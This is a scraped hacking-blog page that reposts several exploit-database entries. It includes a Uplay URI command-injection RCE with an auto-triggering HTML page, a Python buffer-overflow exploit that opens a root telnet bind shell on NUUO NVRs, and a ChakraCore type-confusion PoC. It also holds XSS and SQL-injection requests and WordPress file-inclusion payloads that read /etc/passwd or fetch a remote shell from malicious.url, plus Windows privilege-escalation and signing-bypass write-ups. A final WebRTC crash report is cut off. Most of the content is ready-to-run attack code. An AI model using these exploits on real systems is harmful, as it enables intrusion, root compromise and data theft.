# Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A
# Vulnerability
# The Uplay desktop client does not properly validate user-controlled data passed to its custom
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF)
# integrated within the Uplay client, allowing for arbitrary code execution.
# Installing Uplay registers the following custom uplay protocol handler:
# HKEY_CLASSES_ROOT
# uplay
# (Default) = "URL:uplay Protocol"
# URL Protocol = ""
# DefaultIcon
# (Default) = "upc.exe"
# Shell
# Open
# Command
# (Default) = "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "%1"
# The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution:
'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
# When a victim opens this URI, the string is passed to the Windows ShellExecute function.
# Microsoft states the following: "When ShellExecute executes the pluggable protocol handler with a
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will
# be interpreted as part of the command line. This means that if you use C/C++’s argc and
# argv to determine the arguments passed to your application, the string may be broken
# across multiple parameters."
# "Malicious parties could use additional quote or backslash characters to pass additional command
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on
# the command line could come from malicious parties, and carefully validate them."
# The Uplay desktop client does not properly validate user-controlled data. An attacker can inject
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the
# command line with a quote character and inserts a new switch called --GPU-launcher. Since the
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported.
# The --GPU-launcher switch provides a method to execute arbitrary commands. The following string shows
# the final command, which opens the Windows command prompt and executes the whoami program.
"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "foobar" --GPU-launcher="cmd /K whoami &" --"
# Attack Scenario
# The following attack scenario would result in the compromise of a victim's machine with the vulnerable
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge
# is trying to open "UPlay launcher". After the user gives consent, the vulnerable application runs,
# resulting in arbitrary code execution in the context of the current process.
# This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape
# illegal characters before passing the URI to the protocol handler.
# After Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables
# before the --GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService
# requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear.
# It should be noted, this UAC prompt doesn't prevent command execution from occurring.
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No),
# command execution will still occur once the code that passes the --GPU-launcher switch
# to the CEF is triggered within upc.exe.
# Proof of Concept
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge.
# The first method triggers when the webpage is opened. The second method triggers when the
# hyperlink is clicked by a user.
<!doctype html>
<a href='uplay://foobar" --GPU-launcher="cmd /K whoami &" --'>ubisoft uplay desktop client rce poc</a>
<script>
window.location = 'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
</script>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863580646
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
# Date: 2018-09-17
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.nuuo.com/
# Device: NRVMini2
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Versions: 3.8.0 and below
# Tested Against: 03.07.0000.0011 and 03.08.0000.0005
# Tested on: Ubuntu and OSX
# CVE: N/A
# TRA: https://www.tenable.com/security/research/tra-2018-25
# Description:
# A stack buffer overflow exists in the cgi_system binary. The error occurs
# due to lack of bounds checking on the PHPSESSID value before and when
# it is passed to sprintf in order to generate the session id file name.
# As written, this exploit enables Telnet.
# Executes a command via the stack buffer overflow in cookie parsing. The command
# is executed via 'system' as root. The overlow logic is like so:
#
# address 1: 405e2e34 - load system into r3 and address 2 into lr
#
# .text:000D0E34 0F 48 BD E8 LDMFD SP!, {R0-R3,R11,LR}
# .text:000D0E38 1E FF 2F E1 BX LR
#
# address 2: 406037cc - load the system command into r0. Jump to system.
#
# .text:000F17CC 0D 00 A0 E1 MOV R0, SP
# .text:000F17D0 33 FF 2F E1 BLX R3
#
# [ address 1 ][ r0 ][ r1 ][ r2 ][ r3 system ][ r11 ][ LR - addr2 ][ system command ]
# \x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40touch /tmp/lolwat
# PoC
import requests
import socket
import sys
def stack_buffer_overflow(command, ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print '[+] Executing %s on %s:%s...' % (command, ip, port)
sock.connect((ip, int(port)))
exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' +
'Host: ' + ip + ':' + port + '\r\n' +
'Accept: */*\r\n' +
'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' +
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' +
'\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' + command +
'\r\n\r\n')
sock.sendall(exec_request)
data = sock.recv(1024)
sock.close()
# We should get a 500 Internal error in response
return data.find('500') != -1
# Quickly tries to grab the version of the target. If the target is
# using anything other than 3.7 or 3.8 then we'll bail out since
# haven't tested on any other targets
def check_target(ip, port):
index = requests.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo")
return (index.text.find('<Titan>03.08') != -1 or index.text.find('<Titan>03.07') != -1)
if __name__ == "__main__":
if (len(sys.argv) != 3):
print "Usage: python nvrmini2_enable_telnet.py <ipv4 address> <port>"
sys.exit(1)
ip = sys.argv[1]
port = sys.argv[2]
if int(port) > 65535:
print('[-] Invalid port parameter')
sys.exit(0)
if len(ip.split('.')) != 4:
print('[-] Invalid IP address parameter')
sys.exit(0)
print '[+] Checking for a valid target...'
if (check_target(ip, port) == False):
print('[-] The target is not a NVRMini2 or its using an untested version.')
sys.exit(0)
print '[+] Valid target!'
if (stack_buffer_overflow('mount -t devpts devpts /dev/pts', ip, port) == False):
print('[-] Mount failed')
sys.exit(0)
if (stack_buffer_overflow('/bin/sh -c "/usr/sbin/telnetd -l /bin/bash -b 0.0.0.0"&', ip, port) == False):
print('[-] telnetd bind failed')
sys.exit(0)
print('[+] Success!')
/*
A call to the String.prototype.localeCompare method can be inlineed when it only takes one argument. There are two versions of String.prototype.localeCompare, one [1] is written in JavaScript and the other [2] is written in C++ which just calls the JavaScript version when Intl enabled without updating ImplicitCallFlags. Since JavaScript code could be executed without touching ImplicitCallFlags, this could be exploited in a similar way to that I used for issue 1565 .
The only usable code I could find in the JavaScript localeCompare was:
const thatStr = String(that);
I could override the toString method of "that" which is the first parameter to execute arbitrary JavaScript code. But there was a problem that the toString method was also called in the C++ localeCompare prior to executing the JavaScript localeCompare which updated ImplicitCallFlags. Actually calling a JavaScript function can clear the flag during the initialization process [3] if profiling is enabled, but it was not for Intl.js. So I needed to find another way to exploit this.
Here's the JavaScript localeCompare.
let localeCompareStateCache;
platform.registerBuiltInFunction(tagPublicFunction("String.prototype.localeCompare", function (that, locales = undefined, options = undefined) {
if (this === undefined || this === null) {
platform.raiseThis_NullOrUndefined("String.prototype.localeCompare");
}
const thisStr = String(this);
const thatStr = String(that);
// Performance optimization to cache the state object and UCollator when the default arguments are provided
// TODO(jahorto): investigate caching when locales and/or options are provided
let stateObject;
if (locales === undefined && options === undefined) {
if (localeCompareStateCache === undefined) {
localeCompareStateCache = _.create();
InitializeCollator(localeCompareStateCache, undefined, undefined);
}
stateObject = localeCompareStateCache;
} else {
stateObject = _.create();
InitializeCollator(stateObject, locales, options);
}
return platform.localeCompare(thisStr, thatStr, stateObject, /* forStringPrototypeLocaleCompare true);
}), IntlBuiltInFunctionID.StringLocaleCompare);
My idea was to optimize the method partially, so that when it hits an unprofiled instruction, the flag gets cleared during the bailout process [4].
[1] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/InJavascript/Intl.js#L984
[2] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/JavascriptString.cpp#L1297
[3] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Language/InterpreterStackFrame.cpp#L1831
[4] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Backend/BailOut.cpp#L1492
PoC:
*/
function opt(arr, s) {
arr[0] = 1.1;
if (s !== null) {
let tmp = 'a'.localeCompare(s);
}
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 100; i++) {
'a'.localeCompare('x', []); // Optimize the JavaScript localeCompare
opt(arr, null); // for profiling all instructions in opt.
try {
opt(arr, {toString: () => {
throw 1; // Don't profile "if (locales === undefined && options === undefined) {"
}});
} catch (e) {
}
}
opt(arr, {toString: () => {
// Called twice
arr[0] = {};
}});
print(arr);
}
main();
# Exploit Title: Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting
# Date: 2018-09-09
# Exploit Author: Fahimeh Rezaei
# Vendor Homepage: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Software Link: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Version: rcfilters plugin v2.1.6
# Tested on: Roundcube version 1.0.5
# CVE : CVE-2018-16736
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16736
# https://nvd.nist.gov/vuln/detail/CVE-2018-16736
# https://github.com/eagle00789/RC_Filters/issues/19
# Details:
# In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the
# _whatfilter and _messages parameters (in the Filters section of the settings).
# PoC
POST /rc/?_task=settings&_action=plugin.filters-save HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Referer: https://Target/rc/?_action=plugin.filters&_task=settings
Cookie: roundcube_sessid=; roundcube_sessauth=
Connection: close
Upgrade-Insecure-Requests: 1
_token=09bcde247d252364ea55c217c7654a1f&_whatfilter=from]<script>alert('XSS-1')</script>&_searchstring=whatever&_casesensitive=1&_folders=INBOX&_messages=all])<script>alert('XSS-2')</script>
# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/wechat-broadcast/
# CVE: CVE-2018-16283
# Description
# This bug was found in the file: /wechat-broadcast/wechat/Image.php
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
# The parameter "url" it is not sanitized allowing include local or remote files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol
# to interact with the application.
# PoC
# The following URL have been confirmed that is vulnerable to local and remote file inclusion.
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
# Remote File Inclusion POC:
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt
Windows: Double Dereference in NtEnumerateKey Elevation of Privilege
Platform: Windows 10 1803 (not vulnerable in earlier versions)
Class: Elevation of Privilege
Summary: A number of registry system calls do not correctly handle pre-defined keys resulting in a double dereference which can lead to EoP.
Description:
The registry contains a couple of predefined keys, to generate performance information. These actually exist in the the machine hive under \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib. When these keys are opened the kernel returns a status code of STATUS_PREDEFINED_KEY, but it also returns a handle to the key.
The kernel doesn’t allow these keys to be used for many operations such as enumeration of subkeys and values, so these system calls check before the key is used and returns STATUS_INVALID_HANDLE. The code for this in NtEnumerateKey looks like the following:
status = ObReferenceObjectByHandle(Handle, KEY_ENUMERATE, CmKeyObjectType, &Object);
if ( status >= 0 && Object->Type != 'ky02' ) {
status = STATUS_INVALID_HANDLE;
ObfDereferenceObject(Object); <-- Dereference object,
}
if (status < 0) {
goto EXIT_LABEL;
}
This code in itself is fine, but in 1803 at the exit label we find the following additional code:
if (Object)
ObfDereferenceObject(Object);
This results in the object being dereferenced twice. Due the way the object reference counting works this will not be noticed until the key handle is closed, which results in a REFERENCE_BY_POINTER bugcheck being generated. This might only be a local DoS if the issue was caught earlier, but because the caller can do other things with the corrupted object we can potentially turn this into a UaF and from there elevate privileges. For example the provided PoC passes the handle to NtDuplicateObject which results in the kernel modifying a free pool allocation.
I’d recommend ensuring you check all similar functions such as NtEnumerateValueKey as there seems to be a common issue, perhaps it’s a macro or template which is generating the bad code.
The following is an example dump from a crash, at the end the !pool command is used on the object address to demonstrate the memory allocation was freed before being modified.
Use !analyze -v to get detailed debugging information.
BugCheck 18, {0, ffff8e0db3a0f7a0, 2, ffffffffffffffff}
Probably caused by : ntkrnlmp.exe ( nt!ObfDereferenceObjectWithTag+155dd9 )
Followup: MachineOwner
---------
0: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
REFERENCE_BY_POINTER (18)
Arguments:
Arg1: 0000000000000000, Object type of the object whose reference count is being lowered
Arg2: ffff8e0db3a0f7a0, Object whose reference count is being lowered
Arg3: 0000000000000002, Reserved
Arg4: ffffffffffffffff, Reserved
The reference count of an object is illegal for the current state of the object.
Each time a driver uses a pointer to an object the driver calls a kernel routine
to increment the reference count of the object. When the driver is done with the
pointer the driver calls another kernel routine to decrement the reference count.
Drivers must match calls to the increment and decrement routines. This bugcheck
can occur because an object's reference count goes to zero while there are still
open handles to the object, in which case the fourth parameter indicates the number
of opened handles. It may also occur when the objects reference count drops below zero
whether or not there are open handles to the object, and in that case the fourth parameter
contains the actual value of the pointer references count.
Debugging Details:
------------------
DUMP_CLASS: 1
DUMP_QUALIFIER: 401
BUILD_VERSION_STRING: 17134.1.amd64fre.rs4_release.180410-1804
SYSTEM_MANUFACTURER: Microsoft Corporation
VIRTUAL_MACHINE: HyperV
SYSTEM_PRODUCT_NAME: Virtual Machine
SYSTEM_SKU: None
SYSTEM_VERSION: Hyper-V UEFI Release v3.0
BIOS_VENDOR: Microsoft Corporation
BIOS_VERSION: Hyper-V UEFI Release v3.0
BIOS_DATE: 03/02/2018
BASEBOARD_MANUFACTURER: Microsoft Corporation
BASEBOARD_PRODUCT: Virtual Machine
BASEBOARD_VERSION: Hyper-V UEFI Release v3.0
DUMP_TYPE: 1
BUGCHECK_P1: 0
BUGCHECK_P2: ffff8e0db3a0f7a0
BUGCHECK_P3: 2
BUGCHECK_P4: ffffffffffffffff
CPU_COUNT: 2
CPU_MHZ: a98
CPU_VENDOR: GenuineIntel
CPU_FAMILY: 6
CPU_MODEL: 8e
CPU_STEPPING: 9
CPU_MICROCODE: 6,8e,9,0 (F,M,S,R) SIG: FFFFFFFF'00000000 (cache) FFFFFFFF'00000000 (init)
DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT
BUGCHECK_STR: 0x18
PROCESS_NAME: PoC_NtEnumerateKey_EoP.exe
CURRENT_IRQL: 0
ANALYSIS_SESSION_HOST: DESKTOP-JA4I3EF
ANALYSIS_SESSION_TIME: 06-19-2018 13:36:38.0158
ANALYSIS_VERSION: 10.0.15063.468 amd64fre
LAST_CONTROL_TRANSFER: from fffff80357473ab9 to fffff8035742c330
STACK_TEXT:
ffffb78e`5a91f678 fffff803`57473ab9 : 00000000`00000018 00000000`00000000 ffff8e0d`b3a0f7a0 00000000`00000002 : nt!KeBugCheckEx
ffffb78e`5a91f680 fffff803`57751b9b : 00000000`00000000 00000000`00000000 00020019`00000000 ffffb78e`5a91f7c0 : nt!ObfDereferenceObjectWithTag+0x155dd9
ffffb78e`5a91f6c0 fffff803`5775157d : ffffe58b`763cf580 00000a50`00000040 ffffe58b`75c75f20 00000000`00000001 : nt!ObDuplicateObject+0x58b
ffffb78e`5a91f980 fffff803`5743c943 : ffffe58b`763c4700 00000000`008fe098 ffffb78e`5a91fa28 00000000`00000000 : nt!NtDuplicateObject+0x12d
ffffb78e`5a91fa10 00007ffa`f3cda634 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`008fe078 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007ffa`f3cda634
STACK_COMMAND: kb
THREAD_SHA1_HASH_MOD_FUNC: 4fc60443ee144421725d502d6e3b53056b889c26
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: c219a3da6c3050112ed885b130b5ebbab9cdff96
THREAD_SHA1_HASH_MOD: f08ac56120cad14894587db086f77ce277bfae84
FOLLOWUP_IP:
nt!ObfDereferenceObjectWithTag+155dd9
fffff803`57473ab9 cc int 3
FAULT_INSTR_CODE: 4e8d48cc
SYMBOL_STACK_INDEX: 1
SYMBOL_NAME: nt!ObfDereferenceObjectWithTag+155dd9
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: nt
IMAGE_NAME: ntkrnlmp.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 5b1a4590
BUCKET_ID_FUNC_OFFSET: 155dd9
FAILURE_BUCKET_ID: 0x18_OVER_DEREFERENCE_nt!ObfDereferenceObjectWithTag
BUCKET_ID: 0x18_OVER_DEREFERENCE_nt!ObfDereferenceObjectWithTag
PRIMARY_PROBLEM_CLASS: 0x18_OVER_DEREFERENCE_nt!ObfDereferenceObjectWithTag
TARGET_TIME: 2018-06-19T20:33:20.000Z
OSBUILD: 17134
OSSERVICEPACK: 0
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
SUITE_MASK: 272
PRODUCT_TYPE: 1
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS
OS_LOCALE:
USER_LCID: 0
OSBUILD_TIMESTAMP: 2018-06-08 02:00:00
BUILDDATESTAMP_STR: 180410-1804
BUILDLAB_STR: rs4_release
BUILDOSVER_STR: 10.0.17134.1.amd64fre.rs4_release.180410-1804
ANALYSIS_SESSION_ELAPSED_TIME: 13a4
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:0x18_over_dereference_nt!obfdereferenceobjectwithtag
FAILURE_ID_HASH: {4139309c-4e9f-52f0-ac5e-4041e7a86a20}
Followup: MachineOwner
---------
0: kd> !pool ffff8e0db3a0f7a0
Pool page ffff8e0db3a0f7a0 region is Paged pool
ffff8e0db3a0f000 size: 150 previous size: 0 (Free ) FMfn
ffff8e0db3a0f150 size: 130 previous size: 150 (Free) Free
ffff8e0db3a0f280 size: 40 previous size: 130 (Allocated) MPan
ffff8e0db3a0f2c0 size: 50 previous size: 40 (Free ) SeAt
ffff8e0db3a0f310 size: c0 previous size: 50 (Free ) Se
ffff8e0db3a0f3d0 size: 50 previous size: c0 (Free) Free
ffff8e0db3a0f420 size: 220 previous size: 50 (Allocated) FMfn
ffff8e0db3a0f640 size: a0 previous size: 220 (Allocated) Sect
ffff8e0db3a0f6e0 size: 50 previous size: a0 (Free) Free
*ffff8e0db3a0f730 size: 100 previous size: 50 (Free ) *Key
Pooltag Key : Key objects
ffff8e0db3a0f830 size: 10 previous size: 100 (Free) Free
ffff8e0db3a0f840 size: e0 previous size: 10 (Allocated) NtFs
ffff8e0db3a0f920 size: c0 previous size: e0 (Allocated) FIcs
ffff8e0db3a0f9e0 size: c0 previous size: c0 (Free ) SeTd
ffff8e0db3a0faa0 size: 560 previous size: c0 (Allocated) Ntff
Proof of Concept:
I’ve provided a PoC as a C# project. This only demonstrates the issue and proves that it would be possible to force this issue into a UaF even with the mitigations on reference counting.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Run the PoC on an machine with Windows 10 1803, I’ve only tested x64.
3) The OS should crash, inspect it in a kernel debugger or from the crash dump.
Expected Result:
The OS ignores the pre-defined key as expected.
Observed Result:
The object’s reference count is corrupted.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45436.zip
Windows: CiSetFileCache TOCTOU CVE-2017-11830 Variant WDAC Security Feature Bypass
Platform: Windows 10 1803, 1709 (should include S-Mode but not tested)
Class: Security Feature Bypass
Summary:
While the TOCTOU attack against cache signing has been mitigated through NtSetCachedSigningLevel it’s possible to reach the same code via NtCreateSection leading to circumventing WDAC policies and CIG/PPL.
Description:
I'm reporting this as you've fixed the previous issues (cases 43036 and 40101) so I'm making an assumption you'd also fix this one. The previous issues allowed a unprivileged caller to exploit a race condition in the CiSetFileCache kernel function by calling NtSetCachedSigningLevel. These issues should now be fixed. During my research into PPL/PP bypasses I noticed that the cache will also be written during the initial creation of an image section, when the process is running with an increased section signing level. This is presumably to allow the kernel to cache the signature automatically. This is an issue because it’s possible to create an image section with a writable (and executable) handle to the file and no part of CI then checks whether the caller has write access. It’s possible to have an elevated section signing level by enabling the ProcessSignaturePolicy process mitigation policy, it’s not required to be in a PPL. In fact, while I’ve not tested it, it’s possible that just running inside a process on Windows 10 S-Mode would be sufficient as the section signing level should be elevated for WDAC.
So to exploit this we can do the following:
1. Elevated the section signing level of the current process using SetProcessMitigationPolicy or just running in a WDAC/CIG process.
2. Copy a valid signed file to a known name then open a writable and executable handle to that file.
3. Set an oplock on a known catalog file which will be checked
4. Call NtCreateSection with the handle requesting SEC_IMAGE.
5. Wait for oplock to fire, rewrite the file with an untrusted binary, then release oplock.
6. Close section and file handles. The cache should have been applied to the untrusted file.
Perhaps CI should check whether the file handle has been opened for write access and not write out the cache in those cases as realistically creating an image section from a writable handle should be an unusual operation. The normal loader process opens the handle only for read/execute.
Proof of Concept:
I’ve provided a PoC as a C# project. It will allow you to “cache sign” an arbitrary executable. To test on S-Mode you’ll need to sign the PoC (and the NtApitDotNet.dll assembly) so it’ll run. It copies notepad to a file, attempts to verify it but uses an oplock to rewrite the contents of the file with the untrusted file before it can set the kernel EA.
1) Compile the C# project. It will need to grab the NtApiDotNet v1.1.15 package from NuGet to work.
2) Execute the PoC passing the path to an unsigned file and to the output “cache signed” file, e.g. poc unsigned.exe output.exe. Make sure the output file is on a volume which supports cached signing level such as the main boot volume.
3) You should see it print the signing level, if successful.
4) You should now be able to execute the unsigned file, bypassing the security policy enforcement.
NOTE: If it prints an exception then the exploit failed. The opened catalog files seemed to be cached for some unknown period of time after use so if the catalog file I’m using for a timing signal is already open then the oplock is never broken. Just rerun the poc which will pick a different catalog file to use. Also the output file must be on to a NTFS volume with the USN Change Journal enabled as that’s relied upon by the signature level cache code. Best to do it to the boot drive as that ensures everything should work correctly.
Expected Result:
Access denied or at least an error setting the cached signing level.
Observed Result:
The signing level cache is applied to the file with no further verification. You can now execute the file as if it was signed.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45435.zip
Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2018-08-22
CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009]
Download Site: https://wordpress.org/plugins/bft-autoresponder/
Vendor: Kiboko Labs https://calendarscripts.info/
Vendor Notified: 2018-08-22, Fixed v2.5.1.5
Vendor Contact: @prasunsen wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=203
Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date.
Vulnerability:
These vulnerabilities require administrative priveledges to exploit.
CVE-2018-1002000
There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request.
In line 69 of file controllers/list.php:
65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")");
del_ids is not sanitized properly.
Nine Reflected XSS.
CVE-2018-1002001
In line 22-23 of controllers/list.php:
22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob'];
23 echo "<meta http-equiv='refresh' content='0;url=$url' />";
CVE-2018-1002002
bft_list.html.php:28:
<div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div>
CVE-2018-1002003
bft_list.html.php:29:
<div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div>
CVE-2018-1002004
bft_list.html.php:42:
<input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>">
CVE-2018-1002005
bft_list.html.php:43:
<input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div>
CVE-2018-1002006
integration-contact-form.html.php:14:
<p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p>
CVE-2018-1002007
integration-contact-form.html.php:15:
<p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p>
CVE-2018-1002008
list-user.html.php:4:
<p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p>
CVE-2018-1002009
unsubscribe.html.php:3:
<p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p>
Exploit Code:
SQL Injection CVE-2018-1002000
$ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql
Where post_data is:
POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 150
Cache-Control: max-age=0
Origin: http://example.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http]
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http]
---
[11:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47'
[*] shutting down at 11:50:08
CVE-2018-1002001
http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/localize-my-post/
# CVE: 2018-16299
# DESCRIPTION
# This bug was found in the file: /localize-my-post/ajax/include.php
# include($_REQUEST['file']);
# The parameter "file" it is not sanitized allowing include local files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.
# Local File Inclusion POC:
GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
There is an out-of-bounds read in FEC processing in WebRTC. If a very short RTP packet is received, FEC will assume the packet is longer and process data outside of the allocated buffer.
This bug causes the following ASAN crash:
==109993==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b003b7ff70 at pc 0x55e01a250cd1 bp 0x7fa3af7abc40 sp 0x7fa3af7abc38
